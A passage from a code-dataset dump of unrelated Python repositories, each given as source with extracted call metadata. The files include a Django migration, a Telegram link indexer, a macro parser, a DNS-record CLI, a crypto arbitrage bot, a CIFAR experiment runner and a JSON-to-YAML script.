'os.mkdir', 'os.mkdir', ({(105, 17, 105, 34): 'test_density_path'}, {}), '(test_density_path)', False, 'import os\n'), ((118, 14, 118, 40), 'scipy.io.loadmat', 'loadmat', ({(118, 22, 118, 39): 'ground_truth_path'}, {}), '(ground_truth_path)', False, 'from scipy.io import loadmat\n'), ((77, 20, 77, 35), 'skimage.color.rgb2gray', 'rgb2gray', ({(77, 29, 77, 34): 'image'}, {}), '(image)', False, 'from skimage.color import rgb2gray\n'), ((117, 20, 117, 35), 'skimage.color.rgb2gray', 'rgb2gray', ({(117, 29, 117, 34): 'image'}, {}), '(image)', False, 'from skimage.color import rgb2gray\n'), ((88, 47, 88, 62), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n'), ((89, 47, 89, 62), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n')]
satyamraj123/set-of-python-programs
for1.py
c9a20b37cddc555704799e5ff277488b7eff58a9
fruit='banana' x=len(fruit) print(x)
[]
samir321-pixel/Django_Intershala
Django_Intershala/recruiter/migrations/0004_auto_20210305_1551.py
77aaa24a34873dab4c3302727d5f43986a99809e
# Generated by Django 3.1.7 on 2021-03-05 10:21 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('recruiter', '0003_auto_20210304_2132'), ] operations = [ migrations.RemoveField( model_name='recruiter', name='middle_Name', ), migrations.AlterField( model_name='recruiter', name='first_Name', field=models.CharField(max_length=200, null=True), ), migrations.AlterField( model_name='recruiter', name='last_Name', field=models.CharField(max_length=200, null=True), ), ]
[((13, 8, 16, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((20, 18, 20, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((25, 18, 25, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')]
halhenke/promnesia
src/promnesia/sources/telegram.py
03f46b7e0740790ef091e6f48d0ac2e6bf05bcb7
''' Uses [[https://github.com/fabianonline/telegram_backup#readme][telegram_backup]] database for messages data ''' from pathlib import Path from textwrap import dedent from typing import Optional, Union, TypeVar from urllib.parse import unquote # TODO mm, make it easier to rememember to use... from ..common import PathIsh, Visit, get_logger, Loc, extract_urls, from_epoch, Results, echain # TODO potentially, belongs to my. package # TODO kython? T = TypeVar("T") def unwrap(res: Union[T, Exception]) -> T: if isinstance(res, Exception): raise res else: return res # TODO move to common? def dataset_readonly(db: Path): import dataset # type: ignore # see https://github.com/pudo/dataset/issues/136#issuecomment-128693122 import sqlite3 creator = lambda: sqlite3.connect(f'file:{db}?immutable=1', uri=True) return dataset.connect('sqlite:///' , engine_kwargs={'creator': creator}) def index(database: PathIsh, *, http_only: bool=None) -> Results: """ :param database: the path of the sqlite generated by the _telegram_backup_ java program :param http_only: when true, do not collect IP-addresses and `python.py` strings """ logger = get_logger() path = Path(database) assert path.is_file(), path # TODO could check is_file inside `dataset_readonly()` def make_query(text_query: str): extra_criteria = "AND (M.has_media == 1 OR text LIKE '%http%')" if http_only else "" return dedent( f""" WITH entities AS ( SELECT 'dialog' as type , id , coalesce(username, id) as handle , coalesce(first_name || " " || last_name , username , id ) as display_name FROM users UNION SELECT 'group' as type , id , id as handle , coalesce(name, id) as display_name FROM chats ) SELECT src.display_name AS chatname , src.handle AS chat , snd.display_name AS sender , M.time AS time , {text_query} AS text , M.id AS mid FROM messages AS M /* chat types are 'dialog' (1-1), 'group' and 'supergroup' */ /* this is abit hacky way to handle all groups in one go */ LEFT JOIN entities AS src ON M.source_id = src.id AND src.type = (CASE M.source_type WHEN 'supergroup' THEN 'group' ELSE M.source_type END) LEFT JOIN entities AS snd ON M.sender_id = snd.id AND snd.type = 'dialog' WHERE M.message_type NOT IN ('service_message', 'empty_message') {extra_criteria} ORDER BY time; """) # TODO context manager? with dataset_readonly(path) as db: # TODO yield error if chatname or chat or smth else is null? for row in db.query(make_query('M.text')): try: yield from _handle_row(row) except Exception as ex: yield echain(RuntimeError(f'While handling {row}'), ex) # , None, sys.exc_info()[2] # TODO hmm. traceback isn't preserved; wonder if that's because it's too heavy to attach to every single exception object.. # old (also 'stable') version doesn't have 'json' column yet... if 'json' in db['messages'].columns: for row in db.query(make_query("json_extract(json, '$.media.webpage.description')")): try: yield from _handle_row(row) except Exception as ex: yield echain(RuntimeError(f'While handling {row}'), ex) def _handle_row(row) -> Results: text = row['text'] if text is None: return urls = extract_urls(text) if len(urls) == 0: return dt = from_epoch(row['time']) mid: str = unwrap(row['mid']) # TODO perhaps we could be defensive with null sender/chat etc and still emit the Visit sender: str = unwrap(row['sender']) chatname: str = unwrap(row['chatname']) chat: str = unwrap(row['chat']) in_context = f'https://t.me/{chat}/{mid}' for u in urls: # https://www.reddit.com/r/Telegram/comments/6ufwi3/link_to_a_specific_message_in_a_channel_possible/ # hmm, only seems to work on mobile app, but better than nothing... yield Visit( url=unquote(u), dt=dt, context=f"{sender}: {text}", locator=Loc.make( title=f"chat with {chatname}", href=in_context, ), )
[((15, 4, 15, 16), 'typing.TypeVar', 'TypeVar', ({(15, 12, 15, 15): '"""T"""'}, {}), "('T')", False, 'from typing import Optional, Union, TypeVar\n'), ((31, 11, 31, 77), 'dataset.connect', 'dataset.connect', (), '', False, 'import dataset\n'), ((43, 11, 43, 25), 'pathlib.Path', 'Path', ({(43, 16, 43, 24): 'database'}, {}), '(database)', False, 'from pathlib import Path\n'), ((30, 22, 30, 73), 'sqlite3.connect', 'sqlite3.connect', (), '', False, 'import sqlite3\n'), ((48, 15, 79, 16), 'textwrap.dedent', 'dedent', ({(49, 12, 79, 15): 'f"""\n WITH entities AS (\n SELECT \'dialog\' as type\n , id\n , coalesce(username, id) as handle\n , coalesce(first_name || " " || last_name\n , username\n , id\n ) as display_name FROM users\n UNION\n SELECT \'group\' as type\n , id\n , id as handle\n , coalesce(name, id) as display_name FROM chats\n )\n SELECT src.display_name AS chatname\n , src.handle AS chat\n , snd.display_name AS sender\n , M.time AS time\n , {text_query} AS text\n , M.id AS mid\n FROM messages AS M\n /* chat types are \'dialog\' (1-1), \'group\' and \'supergroup\' */\n /* this is abit hacky way to handle all groups in one go */\n LEFT JOIN entities AS src ON M.source_id = src.id AND src.type = (CASE M.source_type WHEN \'supergroup\' THEN \'group\' ELSE M.source_type END)\n LEFT JOIN entities AS snd ON M.sender_id = snd.id AND snd.type = \'dialog\'\n WHERE\n M.message_type NOT IN (\'service_message\', \'empty_message\')\n {extra_criteria}\n ORDER BY time;\n """'}, {}), '(\n f"""\n WITH entities AS (\n SELECT \'dialog\' as type\n , id\n , coalesce(username, id) as handle\n , coalesce(first_name || " " || last_name\n , username\n , id\n ) as display_name FROM users\n UNION\n SELECT \'group\' as type\n , id\n , id as handle\n , coalesce(name, id) as display_name FROM chats\n )\n SELECT src.display_name AS chatname\n , src.handle AS chat\n , snd.display_name AS sender\n , M.time AS time\n , {text_query} AS text\n , M.id AS mid\n FROM messages AS M\n /* chat types are \'dialog\' (1-1), \'group\' and \'supergroup\' */\n /* this is abit hacky way to handle all groups in one go */\n LEFT JOIN entities AS src ON M.source_id = src.id AND src.type = (CASE M.source_type WHEN \'supergroup\' THEN \'group\' ELSE M.source_type END)\n LEFT JOIN entities AS snd ON M.sender_id = snd.id AND snd.type = \'dialog\'\n WHERE\n M.message_type NOT IN (\'service_message\', \'empty_message\')\n {extra_criteria}\n ORDER BY time;\n """\n )', False, 'from textwrap import dedent\n'), ((122, 16, 122, 26), 'urllib.parse.unquote', 'unquote', ({(122, 24, 122, 25): 'u'}, {}), '(u)', False, 'from urllib.parse import unquote\n')]
duaneellissd/shellmacros
shellmacros/istr.py
33b5cd1a8794e35a9540f78dca066b8dfc289c97
''' Created on Dec 27, 2019 @author: duane ''' DOLLAR = ord('$') LBRACE = ord('{') RBRACE = ord('}') LPAREN = ord('(') RPAREN = ord(')') class IStrFindResult(object): OK = 0 NOTFOUND = 1 SYNTAX = 2 def __init__(self): self.result = IStrFindResult.SYNTAX self.lhs = 0 self.rhs = 0 self.name = None class IStr(list): ''' This closely models a basic ASCII string Note: Unicode strings are expressly not supported here. The problem this addresses occurs during macro processing. Sometimes macros are defined externally Other times, macros are fully defined with a package. Often macros need to be resolved either partially or fully When a macro is only external - they get in the way of resolving other macros To work around that, we convert the string into an array of integers Then for every macro byte that is 'external' we add 0x100 This makes the byte 'non-matchable' Later, when we convert the resolved string into we strip the 0x100. ''' IGNORE = 0x100 def __init__(self, s): ''' Constructor ''' # convert to integers list.__init__(self, map(ord, s)) def __str__(self): # return as string, stripping flags return ''.join(map(lambda v: chr(v & 0xff), self)) def sslice(self, lhs, rhs): # return as string, stripping flags return ''.join(map(lambda v: chr(v & 0xff), self[lhs:rhs])) def iarray(self): return self[:] def mark(self, lhs, rhs, flagvalue=IGNORE): ''' Apply flags to locations between left and right hand sides, ie: [lhs:rhs] ''' for idx in range(lhs, rhs): self[idx] |= flagvalue def locate(self, needle, lhs, rhs): '''Find this needle(char) in the hay stack(list).''' try: return self.index(needle, lhs, rhs) except: # not found return -1 def replace(self, lhs, rhs, newcontent): '''replace the data between [lhs:rhs] with newcontent''' self[lhs: rhs] = map(ord, newcontent) def next_macro(self, lhs, rhs): ''' Find a macro within the string, return (lhs,rhs) if found If not found, return (-1,-1) If syntax error, return (-2,-2) ''' result = IStrFindResult() result.lhs = lhs result.rhs = rhs # if it is not long enough... if (rhs - lhs) < 4: result.code = result.NOTFOUND return result # We search for the CLOSING # Consider nested: ${ ${foo}_${bar} } # The first thing we must do is "foo" # So find the close tmp = self.locate(RBRACE, result.lhs,result.rhs) if tmp >= 0: _open_symbol = LBRACE else: tmp = self.locate(RPAREN,result.lhs,result.rhs) _open_symbol = RPAREN if tmp < 0: # not found result.code = result.NOTFOUND return result # We want to end at RHS where the closing symbol is result.rhs = tmp while result.lhs < result.rhs: # find DOLLAR dollar_loc = self.locate(DOLLAR, result.lhs, result.rhs) if dollar_loc < 0: # above, we know we have a CLOSE # We could call this a SYNTAX error # but ... we won't we'll leave this as NOT FOUND result.code = result.NOTFOUND return result # we have: DOLLAR + CLOSE # Can we find DOLLAR + OPEN? ch = self[dollar_loc+1] if ch != _open_symbol: # Nope... try again after dollar result.lhs = dollar_loc+1 continue result.lhs = dollar_loc # Do we have a nested macro, ie: ${${x}} tmp = self.locate(DOLLAR, dollar_loc + 1, result.rhs) if tmp >= 0: # we do have a nested macro result.lhs = tmp continue # nope, we are good # Everything between LHS and RHS should be a macro result.code = result.OK result.name = self.sslice(result.lhs + 2, result.rhs) # the RHS should include the closing symbol result.rhs += 1 return result # not found syntax stray dollar or brace result.code = result.SYNTAX return result def test_istr(): def check2(l, r, text, dut): print("----") print("Check (%d,%d)" % (l, r)) print("s = %s" % str(dut)) print("i = %s" % dut.iarray()) result = dut.next_macro(0, len(dut)) if (result.lhs != l) or (result.rhs != r): print("str = %s" % str(dut)) print("int = %s" % dut.iarray()) print("Error: (%d,%d) != (%d,%d)" % (l, r, result.lhs, result.rhs)) assert (False) if text is not None: assert( result.name == text ) dut.mark(l, r) return dut def check(l, r, s): if l >= 0: expected = s[l + 2:r - 1] else: expected = None dut = IStr(s) check2(l, r, expected, dut) st = str(dut) assert (st == s) return dut check(-1, -1, "") check(-1, -1, "a") check(-1, -1, "ab") check(-1, -1, "abc") check(-1, -1, "abcd") check(-1, -1, "abcde") check(-1, -1, "abcdef") check(0, 4, "${a}") check(0, 5, "${ab}") check(0, 6, "${abc}") check(0, 7, "${abcd}") check(1, 5, "a${a}") check(2, 6, "ab${a}") check(3, 7, "abc${a}") check(4, 8, "abcd${a}") check(5, 9, "abcde${a}") check(0, 4, "${a}a") check(0, 4, "${a}ab") check(0, 4, "${a}abc") check(0, 4, "${a}abcd") check(0, 4, "${a}abcde") dut = check(4, 8, "abcd${a}xyz") dut.replace(4, 8, "X") check2(-1, -1, None, dut) r = str(dut) print("Got: %s" % r) assert ("abcdXxyz" == str(dut)) # now nested tests dut = check(5, 9, "abc${${Y}}xyz") dut.replace(5, 9, "X") r = str(dut) assert (r == "abc${X}xyz") dut = check2(3, 7, "${X}", dut) dut.replace(3, 7, "ABC") s = str(dut) r = "abcABCxyz" assert (s == r) print("Success") if __name__ == '__main__': test_istr()
[]
checktheroads/deenis
cli.py
2581e2fcbb08a9c85590bd54e109f24cc87b664f
#!/usr/bin/env python3 """ CLI for Accessing Deenis """ # Standard Imports import sys from pathlib import Path # Module Imports import click # Path Fixes working_dir = Path(__file__).resolve().parent sys.path.append(str(working_dir)) # Project Imports from deenis import Deenis @click.group( help=( "Deenis can be used to group and automate boring DNS tasks. For example, " "`host` can take a hostname, IPv4 Address, and IPv6 Address, and create " "forward A & AAAA, and reverse PTR records (4 actions) with a single command." ) ) def add_records(): """Click Command Group Definition""" # pylint: disable=unnecessary-pass # Dear Pylint: This is how Click likes to do things. Get over it bruh. pass @add_records.command("host", help="Add a Host Record") @click.option("-c", "--config-file", "config_file", help="Path to YAML Config File") @click.option("-4", "--ipv4-address", "ipv4", default=None, help="IPv4 Address") @click.option("-6", "--ipv6-address", "ipv6", default=None, help="IPv6 Address") @click.option("-f", "--fqdn", "fqdn", required=True, help="FQDN") def host(**click_input): """Add host records from CLI""" if not click_input["config_file"]: config_path = Path.cwd().joinpath("deenis.yaml") if not config_path.exists(): raise click.UsageError( click.style( ( f"Config file not specified and not found at {config_path}. " "Please specify a config file path." ), fg="red", bold=True, ) ) elif click_input["config_file"]: config_path = Path().resolve(click_input["config_file"]) if not click_input["ipv4"] and not click_input["ipv6"]: raise click.UsageError( click.style("At least one IP Address is required", fg="red", bold=True) ) try: responses = Deenis(str(config_path)).AddHost( { "hostname": click_input["fqdn"], "ipv4": click_input["ipv4"], "ipv6": click_input["ipv6"], } ) if responses: for res in responses: status, record_record, record, target, errors = res if status == "Success": click.echo( "Added " + click.style(record_record, fg="green", bold=True) + " Record for " + click.style(record, fg="yellow", bold=True) + " Pointing to " + click.style(target, fg="blue", bold=True) ) elif status == "Failure": click.echo( "Error Adding " + click.style(record_record, fg="magenta", bold=True) + " Record for " + click.style(record, fg="cyan", bold=True) + " Pointing to " + click.style(target, fg="red", bold=True) + f"\nErrors:\n" ) for err in errors: click.secho(err, fg="red") if not responses: click.secho("\nNo records were added", fg="magenta", bold=True) except (RuntimeError, AttributeError) as error_exception: raise click.UsageError(click.style(str(error_exception), fg="red", bold=True)) @add_records.command("tenant", help="Bulk Add PTR Records for a Tenant/Customer") @click.option("-c", "--config-file", "config_file", help="Path to YAML Config File") @click.option( "-i", "--crm-id", "crm_id", default=None, help="Unique Tenant Indentifier" ) @click.option( "-4", "--ipv4-prefix", "prefix4", default=None, help="IPv4 Prefix Assignment" ) @click.option( "-6", "--ipv6-prefix", "prefix6", default=None, help="IPv6 Prefix Assignment" ) @click.option( "-f4", "--ipv4-fqdn", "host4", default=None, help="FQDN for IPv4 PTR Target" ) @click.option( "-f6", "--ipv6-fqdn", "host6", default=None, help="FQDN for IPv6 PTR Target" ) def tenant_reverse(**click_input): """Add Tenant Records from CLI""" if not click_input["config_file"]: config_path = Path.cwd().joinpath("deenis.yaml") if not config_path.exists(): raise click.UsageError( click.style( ( f"Config file not specified and not found at {config_path}. " "Please specify a config file path." ), fg="red", bold=True, ) ) elif click_input["config_file"]: config_path = Path().resolve(click_input["config_file"]) if not click_input["prefix4"] and not click_input["prefix6"]: raise click.UsageError( click.style("At least one prefix is required", fg="red", bold=True) ) try: responses = Deenis(str(config_path)).TenantReverse( { "crm_id": click_input["crm_id"], "host4": click_input["host4"], "host6": click_input["host6"], "prefix4": click_input["prefix4"], "prefix6": click_input["prefix6"], } ) """ Response format: [ ( 'Success', 'A', 'test011.omnificent.io', '199.34.95.250', [] ), ( 'Success', 'PTR', '250', 'test011.omnificent.io', [] ) ] """ nl = "\n" tab = " " _text = {"fg": "white", "bold": True} _stat_suc = {"fg": "green", "bold": True} _stat_fail = {"fg": "red", "bold": True} _rec_type = {"fg": "yellow", "bold": True} _rec_name = {"fg": "magenta", "bold": True} _rec_trgt = {"fg": "cyan", "bold": True} _error = {"fg": "red"} click.secho(nl + "Records:" + nl, **_text) for res in responses: status, rec_type, rec_name, rec_trgt, errors = res if status == "Success": _status = ("⚡ " + status, _stat_suc) elif status == "Failure": _status = ("☝ " + status, _stat_fail) click.echo( tab + click.style(_status[0], **_status[1]) + nl + tab * 4 + click.style(rec_type, **_rec_type) + click.style(" ⟫ ", **_text) + click.style(rec_name, **_rec_name) + click.style(" ⟩ ", **_text) + click.style(rec_trgt, **_rec_trgt) ) if errors: click.echo(tab * 4 + click.style("Errors: ", **_stat_fail)) for err in errors: if isinstance(err, dict): for ename in err.keys(): click.echo( tab * 6 + click.style(str(ename) + ":", **_error) + tab + click.style(str(err[ename]), **_error) ) elif isinstance(err, str): click.echo(tab * 4 + click.style(err, **_error)) except (AttributeError, RuntimeError) as tenant_error: raise click.ClickException(tenant_error) if __name__ == "__main__": add_records()
[((19, 1, 25, 1), 'click.group', 'click.group', (), '', False, 'import click\n'), ((34, 1, 34, 84), 'click.option', 'click.option', (), '', False, 'import click\n'), ((35, 1, 35, 80), 'click.option', 'click.option', (), '', False, 'import click\n'), ((36, 1, 36, 80), 'click.option', 'click.option', (), '', False, 'import click\n'), ((37, 1, 37, 65), 'click.option', 'click.option', (), '', False, 'import click\n'), ((98, 1, 98, 84), 'click.option', 'click.option', (), '', False, 'import click\n'), ((99, 1, 101, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((102, 1, 104, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((105, 1, 107, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((108, 1, 110, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((111, 1, 113, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((173, 8, 173, 50), 'click.secho', 'click.secho', ({(173, 20, 173, 40): "(nl + 'Records:' + nl)"}, {}), "(nl + 'Records:' + nl, **_text)", False, 'import click\n'), ((13, 14, 13, 28), 'pathlib.Path', 'Path', ({(13, 19, 13, 27): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n'), ((57, 12, 57, 83), 'click.style', 'click.style', (), '', False, 'import click\n'), ((92, 12, 92, 75), 'click.secho', 'click.secho', (), '', False, 'import click\n'), ((133, 12, 133, 79), 'click.style', 'click.style', (), '', False, 'import click\n'), ((205, 14, 205, 48), 'click.ClickException', 'click.ClickException', ({(205, 35, 205, 47): 'tenant_error'}, {}), '(tenant_error)', False, 'import click\n'), ((41, 22, 41, 32), 'pathlib.Path.cwd', 'Path.cwd', ({}, {}), '()', False, 'from pathlib import Path\n'), ((44, 16, 51, 17), 'click.style', 'click.style', (), '', False, 'import click\n'), ((117, 22, 117, 32), 'pathlib.Path.cwd', 'Path.cwd', ({}, {}), '()', False, 'from pathlib import Path\n'), ((120, 16, 127, 17), 'click.style', 'click.style', (), '', False, 'import click\n'), ((54, 22, 54, 28), 'pathlib.Path', 'Path', ({}, {}), '()', False, 'from pathlib import Path\n'), ((130, 22, 130, 28), 'pathlib.Path', 'Path', ({}, {}), '()', False, 'from pathlib import Path\n'), ((189, 18, 189, 52), 'click.style', 'click.style', ({(189, 30, 189, 38): 'rec_trgt'}, {}), '(rec_trgt, **_rec_trgt)', False, 'import click\n'), ((188, 18, 188, 47), 'click.style', 'click.style', ({(188, 30, 188, 37): '""" ⟩ """'}, {}), "(' ⟩ ', **_text)", False, 'import click\n'), ((192, 37, 192, 74), 'click.style', 'click.style', ({(192, 49, 192, 59): '"""Errors: """'}, {}), "('Errors: ', **_stat_fail)", False, 'import click\n'), ((77, 26, 77, 67), 'click.style', 'click.style', (), '', False, 'import click\n'), ((90, 24, 90, 50), 'click.secho', 'click.secho', (), '', False, 'import click\n'), ((187, 18, 187, 52), 'click.style', 'click.style', ({(187, 30, 187, 38): 'rec_name'}, {}), '(rec_name, **_rec_name)', False, 'import click\n'), ((186, 18, 186, 47), 'click.style', 'click.style', ({(186, 30, 186, 37): '""" ⟫ """'}, {}), "(' ⟫ ', **_text)", False, 'import click\n'), ((75, 26, 75, 69), 'click.style', 'click.style', (), '', False, 'import click\n'), ((86, 26, 86, 66), 'click.style', 'click.style', (), '', False, 'import click\n'), ((185, 18, 185, 52), 'click.style', 'click.style', ({(185, 30, 185, 38): 'rec_type'}, {}), '(rec_type, **_rec_type)', False, 'import click\n'), ((203, 45, 203, 71), 'click.style', 'click.style', ({(203, 57, 203, 60): 'err'}, {}), '(err, **_error)', False, 'import click\n'), ((73, 26, 73, 75), 'click.style', 'click.style', (), '', False, 'import click\n'), ((84, 26, 84, 67), 'click.style', 'click.style', (), '', False, 'import click\n'), ((182, 18, 182, 55), 'click.style', 'click.style', ({(182, 30, 182, 40): '_status[0]'}, {}), '(_status[0], **_status[1])', False, 'import click\n'), ((82, 26, 82, 77), 'click.style', 'click.style', (), '', False, 'import click\n')]
spiolynn/pybo
main_cl.py
186495de315eb8ec47a996de959574f9864da7c4
# coding: utf-8 from bigone import BigOneDog from common import gen_logger import logging import time import json def strategy_eth_big_bnc_eth(dog): """ 正向:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC 反向:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH :param dog: implemention of BigOneDog :return: 正向收益率,反向收益率 """ big_eth_data = dog.get_order_book('BIG-ETH') big_bnc_data = dog.get_order_book('BIG-BNC') eth_bnc_data = dog.get_order_book('ETH-BNC') print('BIG-ETH') print('卖一', big_eth_data['asks'][0]['price'], big_eth_data['asks'][0]['amount']) print('买一', big_eth_data['bids'][0]['price'], big_eth_data['bids'][0]['amount']) print('BIG-BNC') print('卖一', big_bnc_data['asks'][0]['price'], big_bnc_data['asks'][0]['amount']) print('买一', big_bnc_data['bids'][0]['price'], big_bnc_data['bids'][0]['amount']) print('ETH-BNC') print('卖一', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount']) print('买一', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount']) # positive transaction pos_anc = 0.999*0.999*0.999*\ ((1 / (float(big_eth_data['asks'][0]['price']))) * float(big_bnc_data['bids'][0]['price']) ) pos_anc = pos_anc / float(eth_bnc_data['asks'][0]['price']) - 1 # negative transaction neg_anc = 0.999 * 0.999 * 0.999 * \ (float(eth_bnc_data['bids'][0]['price']) / float(big_bnc_data['asks'][0]['price']) * float(big_eth_data['asks'][0]['price'])) neg_anc = neg_anc / 1 - 1 flag = False amt = 2.0 if float(big_eth_data['asks'][0]['amount']) >= amt: if float(big_bnc_data['bids'][0]['amount']) >= amt: if float(eth_bnc_data['asks'][0]['amount']) >= amt * float(big_eth_data['asks'][0]['price']): flag = True msg = "预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润:" if pos_anc < 0.01: result = "利润空间小于1%, 放弃本次套利 0" logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result)) else: result = "利润空间大于1%" if flag is False: result = "{},{}".format(result,"量不足, 放弃本次套利 0") logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result)) else: result = "{},{}".format(result,"执行本次套利 1") logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result)) print("{} {} {} {}".format('BIG-ETH','BID', big_eth_data['asks'][0]['price'], str(amt))) print("{} {} {} {}".format('BIG-BNC','ASK', big_bnc_data['bids'][0]['price'], str(amt))) print("{} {} {} {}".format('ETH-BNC','BID', eth_bnc_data['asks'][0]['price'], str(amt * float(big_eth_data['asks'][0]['price'])))) # dog.create_order('BIG-ETH','ASK', big_eth_data['asks'][0]['price'], '2.0') # dog.create_order('BIG-BNC','BID', big_bnc_data['bids'][0]['price'], '2.0') # dog.create_order('ETH-BNC','ASK', eth_bnc_data['asks'][0]['price'], # str(2.0 * float(big_eth_data['asks'][0]['price']))) return True if neg_anc < 0.01: result = "利润空间小于1%, 放弃本次套利 0" else: result = "利润空间大于1%, 执行本次套利 1" logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result)) return False # return pos_anc, neg_anc def strategy_eth_bnc(dog): eth_bnc_data = dog.get_order_book('ETH-BNC') print('ETH-BNC') print('卖一', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount']) print('买一', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount']) anc = float(eth_bnc_data['asks'][0]['price']) / float(eth_bnc_data['bids'][0]['price']) - 1 print(anc) if anc > 0.02: r = dog.create_order('ETH-BNC', 'BID', str(float(eth_bnc_data['bids'][0]['price'])+0.01), '0.01' ) bid_order_id = r['order_id'] r = dog.create_order('ETH-BNC', 'ASK', str(float(eth_bnc_data['asks'][0]['price'])-0.01), '0.01' ) ask_order_id = r['order_id'] return anc, anc if __name__ == '__main__': gen_logger('bigonetest') logger = logging.getLogger("bigone") with open("PRIVATE_KEY.json",'r') as f: private_key = json.load(f)["key"] dog = BigOneDog(private_key) # strategy_eth_bnc(dog) # dog.get_orders("ETH-BNC",'10') # r = dog.get_order("b79ef031-c477-46f9-b452-7e97aa97435d") # print(r) # r = dog.get_orders('ETH-BNC','10') # print(r) while True: flag = strategy_eth_big_bnc_eth(dog) if flag is True: break else: print("休眠10秒") print("") time.sleep(10) # break # pos_anc, neg_anc = strategy_eth_bnc(dog) # if pos_anc < 0.01: # result = "利润空间小于1%, 放弃本次套利 0" # else: # result = "利润空间大于1%, 执行本次套利 1" # # logger.info("预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润: {0:.2f}%, {1}".format(pos_anc*100,result)) # # if neg_anc < 0.01: # result = "利润空间小于1%, 放弃本次套利 0" # else: # result = "利润空间大于1%, 执行本次套利 1" # # logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result)) # # print("休眠10秒") # print("") # time.sleep(10)
[((108, 4, 108, 28), 'common.gen_logger', 'gen_logger', ({(108, 15, 108, 27): '"""bigonetest"""'}, {}), "('bigonetest')", False, 'from common import gen_logger\n'), ((109, 13, 109, 40), 'logging.getLogger', 'logging.getLogger', ({(109, 31, 109, 39): '"""bigone"""'}, {}), "('bigone')", False, 'import logging\n'), ((113, 10, 113, 32), 'bigone.BigOneDog', 'BigOneDog', ({(113, 20, 113, 31): 'private_key'}, {}), '(private_key)', False, 'from bigone import BigOneDog\n'), ((112, 22, 112, 34), 'json.load', 'json.load', ({(112, 32, 112, 33): 'f'}, {}), '(f)', False, 'import json\n'), ((129, 12, 129, 26), 'time.sleep', 'time.sleep', ({(129, 23, 129, 25): '(10)'}, {}), '(10)', False, 'import time\n')]
gahaalt/cifar-vs-tensorflow2
run_experiments.py
547d131382438ef76e315dde06a6870737f1fbad
import os import yaml import logging import importlib os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' logging.getLogger('tensorflow').disabled = True from cifar_training_tools import cifar_training, cifar_error_test def print_dict(d, tabs=0): tab = '\t' for key in d: if type(d[key]) == dict: print(f"{tab*tabs}{key}:") print_dict(d[key], tabs+1) else: print(f"{tab*tabs}{key}: {d[key]}") print('\n' + '#' * 19) print("TESTING FOR ERRORS!") print('#' * 19) stream = open('experiments.yaml', 'r') for exp in yaml.safe_load_all(stream): if 'skip_error_test' in exp and exp['skip_error_test']: continue model = getattr(importlib.import_module(exp['module']), exp['model']) cifar_error_test(model(**exp['model_parameters'])) print("OK!") print('\n' + '#' * 22) print("MODEL TRAINING BEGINS!") print('#' * 22) stream = open('experiments.yaml', 'r') for exp in yaml.safe_load_all(stream): print(); print_dict(exp); print(); model = getattr(importlib.import_module(exp['module']), exp['model']) cifar_training(model(**exp['model_parameters']), **exp['train_parameters'])
[((25, 11, 25, 37), 'yaml.safe_load_all', 'yaml.safe_load_all', ({(25, 30, 25, 36): 'stream'}, {}), '(stream)', False, 'import yaml\n'), ((39, 11, 39, 37), 'yaml.safe_load_all', 'yaml.safe_load_all', ({(39, 30, 39, 36): 'stream'}, {}), '(stream)', False, 'import yaml\n'), ((6, 0, 6, 31), 'logging.getLogger', 'logging.getLogger', ({(6, 18, 6, 30): '"""tensorflow"""'}, {}), "('tensorflow')", False, 'import logging\n'), ((29, 20, 29, 58), 'importlib.import_module', 'importlib.import_module', ({(29, 44, 29, 57): "exp['module']"}, {}), "(exp['module'])", False, 'import importlib\n'), ((42, 20, 42, 58), 'importlib.import_module', 'importlib.import_module', ({(42, 44, 42, 57): "exp['module']"}, {}), "(exp['module'])", False, 'import importlib\n')]
cristicalin/tools
json2yaml.py
b8fe4efb1143a575d102d3a8e368052a4ecdceae
#!/usr/bin/python import sys import yaml import json if __name__ == '__main__': content = json.load(sys.stdin) print yaml.dump(content, indent=2, default_flow_style=False)
[]
UpSea/midProjects
histdata/mt5db/script_DownloadAndStoreToMongodb.py
ed6086e74f68b1b89f725abe0b270e67cf8993a8
